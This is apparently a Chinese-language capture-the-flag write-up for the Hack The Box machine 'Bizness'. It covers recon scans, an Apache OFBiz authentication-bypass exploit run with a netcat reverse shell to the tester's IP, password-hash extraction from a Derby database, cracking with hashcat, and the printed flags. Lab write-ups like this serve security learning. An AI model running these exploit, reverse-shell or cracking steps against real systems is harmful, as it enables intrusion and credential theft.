Main
$ nmap -p- 10.10.11.252 --min-rate 1000
![[Meachines][Easy]Bizness插图](https://img.4awl.net/img/ca/621cb216652d442aa3848f180e18d5.jpg "[Meachines][Easy]Bizness插图")
$ dirsearch -u https://bizness.htb/
![[Meachines][Easy]Bizness插图1](https://img.4awl.net/img/b5/bc247afccc1343a7f8430aabd73937.jpg "[Meachines][Easy]Bizness插图1")
$ whatweb https://bizness.htb/control/login
![[Meachines][Easy]Bizness插图2](https://img.4awl.net/img/d6/1d0e867a22267d5e6a862bfc73e4cb.jpg "[Meachines][Easy]Bizness插图2")
存在一个未授权的RCE
![[Meachines][Easy]Bizness插图3](https://img.4awl.net/img/cd/c9a71ecd917c4b71b2b05250e12ae7.jpg "[Meachines][Easy]Bizness插图3")
$ git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git $ cd Apache-OFBiz-Authentication-Bypass/ $ python3 exploit.py --url https://bizness.htb/ --cmd 'nc -c bash 10.10.16.23 10032'
![[Meachines][Easy]Bizness插图4](https://img.4awl.net/img/3e/9aac51c47f232f768bc3ddc7371ab2.jpg "[Meachines][Easy]Bizness插图4")
User Flag
$ cat /home/ofbiz/user.txt
![[Meachines][Easy]Bizness插图5](https://img.4awl.net/img/43/878cd5cab974ca6e7ee3ace5c7c53b.jpg "[Meachines][Easy]Bizness插图5")
4f868ad44d8eb00d2d7d094bd5279de0
Root Flag
$ cat /opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat
![[Meachines][Easy]Bizness插图6](https://img.4awl.net/img/e1/b5c34b16dad18cd1db7efc8e44f51f.jpg "[Meachines][Easy]Bizness插图6")
为了使用hashcat等密码破解工具破解这些哈希值,需要先将其进行base64解码,然后转换为十六进制字符串。这是因为hashcat等工具通常需要将哈希值以十六进制字符串的形式输入进行破解。
![[Meachines][Easy]Bizness插图7](https://img.4awl.net/img/ea/099f99a646b0a995f87b1570042caa.jpg "[Meachines][Easy]Bizness插图7")
$ hashcat -m 120 -a 0 -d 1 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt
![[Meachines][Easy]Bizness插图8](https://img.4awl.net/img/04/8d3031562e486a99fe5cfb8ffbcdd4.jpg "[Meachines][Easy]Bizness插图8")
$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
- $SHA$: 这部分指示了使用的哈希算法。在这种情况下,$SHA$表示密码是使用SHA哈希算法进行加密的。
d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I: 这部分是经过哈希处理的密码值。通常,密码哈希值是通过将密码与随机生成的字符串(称为盐值)一起输入到哈希函数中生成的。在这个字符串中,d$可能是盐值的一部分,而uP0_QaVBpDWFeo8-dRzDqRwXQ2I可能是密码的哈希值。
![[Meachines][Easy]Bizness插图9](https://img.4awl.net/img/d2/3ad495c36ef84ade84945496e9d41d.jpg "[Meachines][Easy]Bizness插图9")
# cat /root/root.txt
![[Meachines][Easy]Bizness插图10](https://img.4awl.net/img/f0/c3b43cdf7c18f876752b72612cfd06.jpg "[Meachines][Easy]Bizness插图10")
8c72dd83a893d66bef258dc1c43eb2e4
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
